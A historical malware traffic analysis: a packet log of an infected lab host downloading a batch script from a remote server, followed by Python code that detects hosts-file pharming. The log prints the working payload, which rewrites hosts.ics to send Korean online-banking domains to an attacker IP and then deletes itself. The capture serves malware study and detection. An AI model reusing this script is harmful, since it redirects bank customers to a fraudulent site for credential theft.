HISTORICAL Malware Sample – TIJ – Traffic Sample Indicators Analysis

July 25, 2015

2013-02-03 21:49:49.176564 IP 8.8.8.8.53 > 172.16.253.130.53: 34738 1/0/0 A 174.139.45.210 (50)

E..N[Y….%……….5.5.:……………siqiao.gnway.net…………..<….-.

2013-02-03 21:49:49.179485 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 21:49:49.284041 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 2525759170, ack 2948849308, win 64240, length 0

2013-02-03 21:49:49.358483 IP 4.2.2.2.53 > 172.16.253.130.53: 34738 1/0/0 A 174.139.45.210 (50)

E..N[[…./……….5.5.:'…………..siqiao.gnway.net…………..<….-.

2013-02-03 21:49:49.717469 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 21:49:49.823584 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 4146087877, ack 1, win 64240, length 0

2013-02-03 21:49:50.263366 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 21:49:50.370471 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 706310022, ack 1, win 64240, length 0

2013-02-03 21:49:51.356265 IP 172.16.253.130.1068 > 174.139.45.210.8888: Flags [S], seq 1431855748, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 21:49:51.478162 IP 174.139.45.210.8888 > 172.16.253.130.1068: Flags [S.], seq 2850725909, ack 1431855749, win 64240, options [mss 1460], length 0

2013-02-03 21:49:51.478204 IP 172.16.253.130.1068 > 174.139.45.210.8888: Flags [.], ack 1, win 64240, length 0

2013-02-03 21:49:51.478519 IP 172.16.253.130.1068 > 174.139.45.210.8888: Flags [P.], seq 1:105, ack 1, win 64240, length 104

E….N@…t)……-..,".UXb…..P….m..http://110.34.198.123:888/3.txt………………..|…|….

..|L..|?..|0………………………A1..

2013-02-03 21:49:51.871030 IP 172.16.253.130.1070 > 110.34.198.123.888: Flags [P.], seq 1:280, ack 1, win 64240, length 279

E..?.R@….6….n".{…x<….8 |P….N..GET /3.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: 110.34.198.123:888

Connection: Keep-Alive

2013-02-03 21:49:51.871230 IP 110.34.198.123.888 > 172.16.253.130.1070: Flags [.], ack 280, win 64240, length 0

2013-02-03 21:49:51.980369 IP 110.34.198.123.888 > 172.16.253.130.1070: Flags [P.], seq 1:1229, ack 280, win 64240, length 1228

E…[b…..pn”.{…..x…8 |<…P…….HTTP/1.1 200 OK

Content-Length: 8050

Content-Type: text/plain

Last-Modified: Sun, 08 Sep 2013 10:17:38 GMT

Accept-Ranges: bytes

ETag: "888d50a57cacce1:a22"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 09 Sep 2013 01:27:28 GMT

@echo off

echo.

del %systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      open.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.kbstar.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      open.kbstar.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.shinhan.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      open.shinhan.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.ibk.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.25

2013-02-03 21:49:52.210020 IP 110.34.198.123.888 > 172.16.253.130.1070: Flags [P.], seq 7369:8302, ack 280, win 64240, length 933

E…[i……n".{…..x…8=D<…P…….\etc\hosts.ics

echo 67.198.255.93 www.ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      www.ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 www.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      www.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 www.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      www.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

del %0

2013-02-03 21:49:52.210050 IP 172.16.253.130.1070 > 110.34.198.123.888: Flags [.], ack 8302, win 64240, length 0

2013-02-03 21:50:00.208193 IP 172.16.253.130.53 > 8.8.8.8.53: 41343+ A? blog.sina.com.cn. (34)

E..>.j……………5.5.*.6………….blog.sina.com.cn…..

2013-02-03 21:50:00.208388 IP 172.16.253.130.53 > 4.2.2.2.53: 41343+ A? blog.sina.com.cn. (34)

E..>.k……………5.5.*.B………….blog.sina.com.cn…..

2013-02-03 21:50:00.323675 IP 8.8.8.8.53 > 172.16.253.130.53: 41343 2/0/0 CNAME blogx.sina.com.cn., A 218.30.115.254 (70)

E..b[j….%~………5.5.N.1………….blog.sina.com.cn…………..9…blogx………..9….s.

2013-02-03 21:50:00.361090 IP 172.16.253.130.1071 > 218.30.115.254.80: Flags [S], seq 1585046124, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 21:50:00.646350 IP 218.30.115.254.80 > 172.16.253.130.1071: Flags [S.], seq 317158172, ack 1585046125, win 64240, options [mss 1460], length 0

2013-02-03 21:50:00.646392 IP 172.16.253.130.1071 > 218.30.115.254.80: Flags [.], ack 1, win 64240, length 0

2013-02-03 21:50:00.646582 IP 172.16.253.130.1071 > 218.30.115.254.80: Flags [P.], seq 1:95, ack 1, win 64240, length 94

E….o@….S……s../.P^y.m..s.P…{…GET /s/blog_b2afd7fe01019tkf.html HTTP/1.1

User-Agent: getURLDown

Host: blog.sina.com.cn

2013-02-03 22:02:06.763902 IP 172.16.253.130.1114 > 192.157.200.62.6000: Flags [S], seq 4204045623, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 22:02:09.638461 IP 172.16.253.130.1114 > 192.157.200.62.6000: Flags [S], seq 4204045623, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 22:02:11.114264 IP 192.157.200.62.6000 > 172.16.253.130.1114: Flags [R.], seq 3384060252, ack 4204045624, win 64240, length 0

2013-02-03 22:02:11.607218 IP 172.16.253.130.1114 > 192.157.200.62.6000: Flags [S], seq 4204045623, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 22:02:17.135097 IP 192.157.200.62.6000 > 172.16.253.130.1114: Flags [R.], seq 4229987254, ack 1, win 64240, length 0

2013-02-03 22:02:17.436525 IP 172.16.253.130.1115 > 192.157.200.62.6000: Flags [S], seq 3341330087, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 22:02:17.539165 IP 192.157.200.62.6000 > 172.16.253.130.1115: Flags [R.], seq 1167834967, ack 3341330088, win 64240, length 0

2013-02-03 22:02:18.060956 IP 172.16.253.130.1115 > 192.157.200.62.6000: Flags [S], seq 3341330087, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 22:02:23.368473 IP 192.157.200.62.6000 > 172.16.253.130.1115: Flags [R.], seq 693350802, ack 1, win 64240, length 0

2013-02-03 22:02:23.857379 IP 172.16.253.130.1115 > 192.157.200.62.6000: Flags [S], seq 3341330087, win 64240, options [mss 1460,nop,nop,sackOK], length 0

2013-02-03 22:02:25.988814 IP 192.157.200.62.6000 > 172.16.253.130.1115: Flags [R.], seq 570998218, ack 1, win 64240, length 0
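
The 3.txt response above is a batch script that points Korean online-banking hostnames at 67.198.255.93 by appending to hosts.ics. As an added example, not part of the original capture, the Python below extracts such redirects from a captured script and flags the ones that send a hostname to a routable address; SAMPLE_BATCH is a constructed excerpt of the payload with one loopback line added to exercise the filter, and the function names are my own.

```python
import ipaddress
import re

# Constructed excerpt of the captured 3.txt payload (the real file is ~8 KB and
# repeats the pattern); the 127.0.0.1 line is added to show the routable filter.
SAMPLE_BATCH = r"""@echo off
del %systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93      ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 open.kbstar.com>>%systemroot%\system32\drivers\etc\hosts.ics
echo 127.0.0.1 localhost>>%systemroot%\system32\drivers\etc\hosts.ics
del %0
"""

# "echo <ip> <host>>>...\etc\hosts" or "...\etc\hosts.ics", case-insensitive.
HOSTS_ECHO = re.compile(
    r"^echo\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+?)>>\S*\\etc\\hosts(?:\.ics)?\s*$",
    re.IGNORECASE,
)

def extract_hosts_redirects(batch_text):
    """Return {hostname: ip} for every line that appends to hosts/hosts.ics."""
    redirects = {}
    for line in batch_text.splitlines():
        m = HOSTS_ECHO.match(line.strip())
        if m:
            redirects[m.group(2).lower()] = m.group(1)
    return redirects

def suspicious_redirects(redirects):
    """Keep only hostnames sent to a routable address; a hosts entry mapping a
    third-party domain to a public IP is the signature of pharming."""
    flagged = {}
    for host, ip in redirects.items():
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:  # malformed octets such as 300.1.1.1
            continue
        if not (addr.is_loopback or addr.is_private or addr.is_unspecified):
            flagged[host] = ip
    return flagged

def tamper_report(batch_text):
    """Group pharmed hostnames by sinkhole IP; note the wipe and self-delete steps."""
    lines = [l.strip().lower() for l in batch_text.splitlines()]
    by_sink = {}
    for host, ip in suspicious_redirects(extract_hosts_redirects(batch_text)).items():
        by_sink.setdefault(ip, []).append(host)
    return {"sinkholes": {ip: sorted(h) for ip, h in by_sink.items()},
            "wipes_hosts": any(l.startswith("del ") and "hosts" in l for l in lines),
            "self_deletes": "del %0" in lines}
```

The same functions can be run over a hosts.ics file pulled from a suspect host, since each hosts line can be prefixed with `echo ` and a `>>hosts.ics` suffix before parsing.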
